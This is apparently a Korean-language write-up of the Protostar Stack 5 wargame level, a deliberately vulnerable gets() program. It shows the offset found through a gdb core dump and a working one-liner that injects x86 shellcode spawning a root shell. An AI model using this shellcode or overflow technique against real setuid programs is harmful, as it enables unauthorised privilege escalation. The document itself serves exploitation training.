Protostar - Stack 5

1. 문제 Source

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
 char buffer[64];

 gets(buffer);
}

2. 풀이

user@protostar:~$ cp /opt/protostar/bin/stack5 ./
user@protostar:~$ ls
stack5
user@protostar:~$ ulimit -c unlimited
user@protostar:~$ python -c "print 'A'*76 + '\xcc\xcc\xcc\xcc' + 'C'*100" | ./stack5
Segmentation fault (core dumped)
user@protostar:~$ gdb -q -c /tmp/core.11.stack5.1962 
Core was generated by `./stack5'.
Program terminated with signal 11, Segmentation fault.
#0  0xcccccccc in ?? ()
(gdb) i reg
eax            0xbffff7c0	-1073743936
ecx            0xbffff7c0	-1073743936
edx            0xb7fd9334	-1208118476
ebx            0xb7fd7ff4	-1208123404
esp            0xbffff810	0xbffff810
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0xcccccccc	0xcccccccc
eflags         0x10246	[ PF ZF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) x/x $esp
0xbffff810:	0x43434343
(gdb) x/s $esp
0xbffff810:	 'C' <repeats 100 times>

user@protostar:/opt/protostar/bin$ python -c "print 'A'*76 + '\x10\xf8\xff\xbf' + '\x90'*20 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'" | ./stack5
# whoami
root
# id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)